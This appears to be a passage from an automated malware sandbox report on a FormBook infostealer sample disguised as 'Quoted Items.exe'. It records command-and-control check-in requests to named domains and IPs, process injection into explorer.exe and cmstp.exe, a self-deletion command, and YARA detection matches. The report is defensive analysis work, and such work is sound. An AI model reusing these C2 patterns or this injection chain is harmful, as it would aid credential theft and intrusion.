.reloc	0xa0000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x9c0e8	0x37d6	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON	0x9f8c0	0x14	data
RT_VERSION	0x9f8d4	0x364	data

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2017
Assembly Version	1.0.0.0
InternalName	AuthorizationRuleCollect.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	ResetEvent
ProductVersion	1.0.0.0
FileDescription	ResetEvent
OriginalFilename	AuthorizationRuleCollect.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.38.8.8.851518532023883 05/14/22-13:13:06.533808	UDP	2023883	ET DNS Query to a *.top domain - Likely Hostile	51518	53	192.168.2.3	8.8.8.8
192.168.2.3209.17.116.16349806802031412 05/14/22-13:12:56.292892	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49806	80	192.168.2.3	209.17.116.163
192.168.2.3209.17.116.16349806802031449 05/14/22-13:12:56.292892	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49806	80	192.168.2.3	209.17.116.163
192.168.2.3209.17.116.16349806802031453 05/14/22-13:12:56.292892	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49806	80	192.168.2.3	209.17.116.163

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 14, 2022 13:12:56.176590919 CEST	49806	80	192.168.2.3	209.17.116.163
May 14, 2022 13:12:56.292612076 CEST	80	49806	209.17.116.163	192.168.2.3
May 14, 2022 13:12:56.292799950 CEST	49806	80	192.168.2.3	209.17.116.163
May 14, 2022 13:12:56.292891979 CEST	49806	80	192.168.2.3	209.17.116.163
May 14, 2022 13:12:56.410032034 CEST	80	49806	209.17.116.163	192.168.2.3
May 14, 2022 13:12:56.410089016 CEST	80	49806	209.17.116.163	192.168.2.3
May 14, 2022 13:12:56.410192013 CEST	49806	80	192.168.2.3	209.17.116.163
May 14, 2022 13:12:56.410259962 CEST	49806	80	192.168.2.3	209.17.116.163
May 14, 2022 13:12:56.526056051 CEST	80	49806	209.17.116.163	192.168.2.3
May 14, 2022 13:13:01.478405952 CEST	49808	80	192.168.2.3	172.217.168.19
May 14, 2022 13:13:01.494436026 CEST	80	49808	172.217.168.19	192.168.2.3
May 14, 2022 13:13:01.495452881 CEST	49808	80	192.168.2.3	172.217.168.19
May 14, 2022 13:13:01.498105049 CEST	49808	80	192.168.2.3	172.217.168.19
May 14, 2022 13:13:01.513856888 CEST	80	49808	172.217.168.19	192.168.2.3
May 14, 2022 13:13:01.527266026 CEST	80	49808	172.217.168.19	192.168.2.3
May 14, 2022 13:13:01.527288914 CEST	80	49808	172.217.168.19	192.168.2.3
May 14, 2022 13:13:01.527462006 CEST	49808	80	192.168.2.3	172.217.168.19
May 14, 2022 13:13:01.527553082 CEST	49808	80	192.168.2.3	172.217.168.19
May 14, 2022 13:13:01.543385983 CEST	80	49808	172.217.168.19	192.168.2.3
May 14, 2022 13:13:07.044441938 CEST	49810	80	192.168.2.3	180.76.158.103
May 14, 2022 13:13:10.046093941 CEST	49810	80	192.168.2.3	180.76.158.103
May 14, 2022 13:13:16.062084913 CEST	49810	80	192.168.2.3	180.76.158.103
May 14, 2022 13:13:30.076956034 CEST	49836	80	192.168.2.3	180.76.158.103
May 14, 2022 13:13:33.079175949 CEST	49836	80	192.168.2.3	180.76.158.103
May 14, 2022 13:13:39.095287085 CEST	49836	80	192.168.2.3	180.76.158.103

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 14, 2022 13:12:56.050158024 CEST	49844	53	192.168.2.3	8.8.8.8
May 14, 2022 13:12:56.171458006 CEST	53	49844	8.8.8.8	192.168.2.3
May 14, 2022 13:13:01.430006981 CEST	63861	53	192.168.2.3	8.8.8.8
May 14, 2022 13:13:01.477284908 CEST	53	63861	8.8.8.8	192.168.2.3
May 14, 2022 13:13:06.533807993 CEST	51518	53	192.168.2.3	8.8.8.8
May 14, 2022 13:13:07.042562962 CEST	53	51518	8.8.8.8	192.168.2.3
May 14, 2022 13:13:29.585231066 CEST	49723	53	192.168.2.3	8.8.8.8
May 14, 2022 13:13:30.045614958 CEST	53	49723	8.8.8.8	192.168.2.3
May 14, 2022 13:13:33.080382109 CEST	52581	53	192.168.2.3	8.8.8.8
May 14, 2022 13:13:33.120031118 CEST	53	52581	8.8.8.8	192.168.2.3
May 14, 2022 13:13:38.129200935 CEST	50152	53	192.168.2.3	8.8.8.8
May 14, 2022 13:13:38.153343916 CEST	53	50152	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 14, 2022 13:12:56.050158024 CEST	192.168.2.3	8.8.8.8	0xbea6	Standard query (0)	www.royaltortoisecookieco.online	A (IP address)	IN (0x0001)
May 14, 2022 13:13:01.430006981 CEST	192.168.2.3	8.8.8.8	0x104b	Standard query (0)	www.gratefulgrandmas.com	A (IP address)	IN (0x0001)
May 14, 2022 13:13:06.533807993 CEST	192.168.2.3	8.8.8.8	0x3ebc	Standard query (0)	www.zhouyihong.top	A (IP address)	IN (0x0001)
May 14, 2022 13:13:29.585231066 CEST	192.168.2.3	8.8.8.8	0x9186	Standard query (0)	www.zhouyihong.top	A (IP address)	IN (0x0001)
May 14, 2022 13:13:33.080382109 CEST	192.168.2.3	8.8.8.8	0xbea	Standard query (0)	www.ivyleaguereading.com	A (IP address)	IN (0x0001)
May 14, 2022 13:13:38.129200935 CEST	192.168.2.3	8.8.8.8	0x8b1b	Standard query (0)	www.quinten-and-sam.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 14, 2022 13:12:56.171458006 CEST	8.8.8.8	192.168.2.3	0xbea6	No error (0)	www.royaltortoisecookieco.online		209.17.116.163	A (IP address)	IN (0x0001)
May 14, 2022 13:13:01.477284908 CEST	8.8.8.8	192.168.2.3	0x104b	No error (0)	www.gratefulgrandmas.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)
May 14, 2022 13:13:01.477284908 CEST	8.8.8.8	192.168.2.3	0x104b	No error (0)	ghs.googlehosted.com		172.217.168.19	A (IP address)	IN (0x0001)
May 14, 2022 13:13:07.042562962 CEST	8.8.8.8	192.168.2.3	0x3ebc	No error (0)	www.zhouyihong.top		180.76.158.103	A (IP address)	IN (0x0001)
May 14, 2022 13:13:30.045614958 CEST	8.8.8.8	192.168.2.3	0x9186	No error (0)	www.zhouyihong.top		180.76.158.103	A (IP address)	IN (0x0001)
May 14, 2022 13:13:33.120031118 CEST	8.8.8.8	192.168.2.3	0xbea	Name error (3)	www.ivyleaguereading.com	none	none	A (IP address)	IN (0x0001)
May 14, 2022 13:13:38.153343916 CEST	8.8.8.8	192.168.2.3	0x8b1b	No error (0)	www.quinten-and-sam.com		3.93.205.129	A (IP address)	IN (0x0001)
May 14, 2022 13:13:38.153343916 CEST	8.8.8.8	192.168.2.3	0x8b1b	No error (0)	www.quinten-and-sam.com		54.198.222.183	A (IP address)	IN (0x0001)
May 14, 2022 13:13:38.153343916 CEST	8.8.8.8	192.168.2.3	0x8b1b	No error (0)	www.quinten-and-sam.com		100.24.89.80	A (IP address)	IN (0x0001)
May 14, 2022 13:13:38.153343916 CEST	8.8.8.8	192.168.2.3	0x8b1b	No error (0)	www.quinten-and-sam.com		18.211.19.104	A (IP address)	IN (0x0001)
May 14, 2022 13:13:38.153343916 CEST	8.8.8.8	192.168.2.3	0x8b1b	No error (0)	www.quinten-and-sam.com		52.71.193.116	A (IP address)	IN (0x0001)
May 14, 2022 13:13:38.153343916 CEST	8.8.8.8	192.168.2.3	0x8b1b	No error (0)	www.quinten-and-sam.com		3.234.11.211	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.royaltortoisecookieco.online

www.gratefulgrandmas.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49806	209.17.116.163	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 13:12:56.292891979 CEST	10287	OUT	GET /gfge/?-ZEhG=0pO83p&atm=bkTODcW29ZLLFsJ1z0hFzGOlzA/dTRh9UhQLTYc1zt8rWVzKVHP86zdm8t9X8OCiEKYk HTTP/1.1 Host: www.royaltortoisecookieco.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 14, 2022 13:12:56.410032034 CEST	10288	IN	HTTP/1.1 400 Bad Request Server: openresty/1.19.9.1 Date: Sat, 14 May 2022 11:12:56 GMT Content-Type: text/html Content-Length: 163 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.19.9.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49808	172.217.168.19	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 13:13:01.498105049 CEST	10529	OUT	GET /gfge/?atm=Z4UEWxzHsbgHCWzNn0OH8uguYAGXLulTgu05WjhJOdFN0vK06536biQ9Uf++w6wnfUsW&-ZEhG=0pO83p HTTP/1.1 Host: www.gratefulgrandmas.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 14, 2022 13:13:01.527266026 CEST	10814	IN	HTTP/1.1 302 Found Location: https://www.gratitudeaddict.com/ Date: Sat, 14 May 2022 11:13:01 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 229 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 72 61 74 69 74 75 64 65 61 64 64 69 63 74 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.gratitudeaddict.com/">here</A>.</BODY></HTML>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Quoted Items.exePID: 6360, Parent PID: 3272

General

Target ID:	0
Start time:	13:11:26
Start date:	14/05/2022
Path:	C:\Users\user\Desktop\Quoted Items.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quoted Items.exe"
Imagebase:	0xbf0000
File size:	640512 bytes
MD5 hash:	901567A408D891FC0F67E15221D1B7E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.287722353.000000000402A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.286733005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: Quoted Items.exePID: 6688, Parent PID: 6360

General

Target ID:	4
Start time:	13:11:39
Start date:	14/05/2022
Path:	C:\Users\user\Desktop\Quoted Items.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Quoted Items.exe
Imagebase:	0x600000
File size:	640512 bytes
MD5 hash:	901567A408D891FC0F67E15221D1B7E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.350947066.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.351326281.0000000000C10000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.278783725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.277402200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.351362471.0000000000C50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3968, Parent PID: 6688

General

Target ID:	5
Start time:	13:11:45
Start date:	14/05/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6b8cf0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.316596581.000000000D158000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.338397807.000000000D158000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmstp.exePID: 612, Parent PID: 3968

General

Target ID:	16
Start time:	13:12:11
Start date:	14/05/2022
Path:	C:\Windows\SysWOW64\cmstp.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmstp.exe
Imagebase:	0x1230000
File size:	82944 bytes
MD5 hash:	4833E65ED211C7F118D4A11E6FB58A09
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.515431699.0000000003370000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.514085622.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.515850944.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6552, Parent PID: 612

General

Target ID:	18
Start time:	13:12:15
Start date:	14/05/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\Quoted Items.exe"
Imagebase:	0xc20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6548, Parent PID: 6552

General

Target ID:	19
Start time:	13:12:16
Start date:	14/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Quoted Items.exePID: 6360, Parent PID: 3272COMMON

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	70
Total number of Limit Nodes:	3

Executed Functions

Function 02D64360 Relevance: 2.2, Strings: 1, Instructions: 989
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UUUU, xrefs: 02D6483D

Memory Dump Source

Source File: 00000000.00000002.286355741.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d60000_Quoted Items.jbxd

Similarity

API ID:
String ID: UUUU
API String ID: 0-1798160573
Opcode ID: c772767c63b812cfc4af72b1a9c47f1a5c64b35eee60790e0306f696cb78fced
Instruction ID: 4a21ee459ced40f51fe2663eb92f25e30bff05cf36859e7830aca3e476295e64
Opcode Fuzzy Hash: c772767c63b812cfc4af72b1a9c47f1a5c64b35eee60790e0306f696cb78fced
Instruction Fuzzy Hash: B3A2A075A00628CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB325DB319E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 07835AD8 Relevance: 2.2, Strings: 1, Instructions: 956
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UUUU, xrefs: 07835FAA

Memory Dump Source

Source File: 00000000.00000002.290985963.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_Quoted Items.jbxd

Similarity

API ID:
String ID: UUUU
API String ID: 0-1798160573
Opcode ID: b830056cf87e36760b860c81ce32831d8fa2f197fb0db0cbf6206798d8ae9d56
Instruction ID: c79e26b841aeb186415c0652908a69f35d9181f9dcc0235d2e383a42d6cd5711
Opcode Fuzzy Hash: b830056cf87e36760b860c81ce32831d8fa2f197fb0db0cbf6206798d8ae9d56
Instruction Fuzzy Hash: 1EA2A275A00228DFDB64CF69C984AD9BBB2FF89304F1581E9D509AB325DB319E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 07836B98 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.290985963.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_Quoted Items.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74d7badf47eac297e50e05c82d72cad667c73e4a61424d39050fe6b2ab22bbe6
Instruction ID: 740e910bddf53be6b8a9263c4590a374dc4c6f5cf50bab7b71af5ad52a860f9a
Opcode Fuzzy Hash: 74d7badf47eac297e50e05c82d72cad667c73e4a61424d39050fe6b2ab22bbe6
Instruction Fuzzy Hash: C25141B1E056189BEB5CCF6B9D4069EFBF7AFC9200F14C5BA844CAB255EB3009468F51

Uniqueness

Uniqueness Score: -1.00%

Function 0783EB10 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0783ED46

Memory Dump Source

Source File: 00000000.00000002.290985963.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_Quoted Items.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9740d6227ffb0d826a0d6b235f75ee4588555e63cc85f9fab14b214b4eb31354
Instruction ID: 7527b8f0e7b03545ea48538ab13886a1fa46aed63359807c4e28887f0afc4579
Opcode Fuzzy Hash: 9740d6227ffb0d826a0d6b235f75ee4588555e63cc85f9fab14b214b4eb31354
Instruction Fuzzy Hash: BF9149B1D00219CFDB20DFA9C8407EEBBB2AF48314F158569E809E7280DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02D6C3D0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D6C4E2

Memory Dump Source

Source File: 00000000.00000002.286355741.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d60000_Quoted Items.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: d0f38a65082efb61d9991135a4f402d4cb6a5f6d7721bfb994718d55c6e607ec
Instruction ID: ce47103185e1b7b259a6c824a178f1caf8a8cd0a455a7afae6444f305c6958c5
Opcode Fuzzy Hash: d0f38a65082efb61d9991135a4f402d4cb6a5f6d7721bfb994718d55c6e607ec
Instruction Fuzzy Hash: 2C41A0B1D10349DFDB14CF99D884ADEBBB5BF88314F24812AE819AB310D774A845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02D66BDE Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02D66C99

Memory Dump Source

Source File: 00000000.00000002.286355741.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d60000_Quoted Items.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d2fb2858615ca49e44a226c2cb5f76973f6d46d28dd8b5f848a4bbb5197992fc
Instruction ID: cbb55add1490014b650f9cc4bf19727eeee84cdb7ab26c33a880becc9d904cfd
Opcode Fuzzy Hash: d2fb2858615ca49e44a226c2cb5f76973f6d46d28dd8b5f848a4bbb5197992fc
Instruction Fuzzy Hash: 3B41C1B1C00618CBDB24DFA9C884BDEBBB5FF89308F65816AD409AB350DB756945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02D657EC Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02D66C99

Memory Dump Source

Source File: 00000000.00000002.286355741.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d60000_Quoted Items.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 44a4deacfdd12882db7f0944575c23b04a5cf1b4c5169166f09e748d876c3b2a
Instruction ID: a5d3b15298e1dd6e144c26432563cebafe3fe0590e121e50127af938b8c47be3
Opcode Fuzzy Hash: 44a4deacfdd12882db7f0944575c23b04a5cf1b4c5169166f09e748d876c3b2a
Instruction Fuzzy Hash: 6841D3B0C0461CCBDB24DFA9C884BDEBBB5FF89304F61845AD409AB250DB75A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02D6E990 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 02D6EA51

Memory Dump Source

Source File: 00000000.00000002.286355741.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d60000_Quoted Items.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 759dd6af9356299dca65aa5399e9048fb447003969aeae91bd22630bf5413e1b
Instruction ID: 86960c89e14a648266fbf16932107bfa96e02ac83ea83d4d52ce10b7d3543bbe
Opcode Fuzzy Hash: 759dd6af9356299dca65aa5399e9048fb447003969aeae91bd22630bf5413e1b
Instruction Fuzzy Hash: C9410BB8A00345CFCB14CF99C448AAABBF5FF88314F25C559E519A7321D775A845CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0783E7F8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0783E888

Memory Dump Source

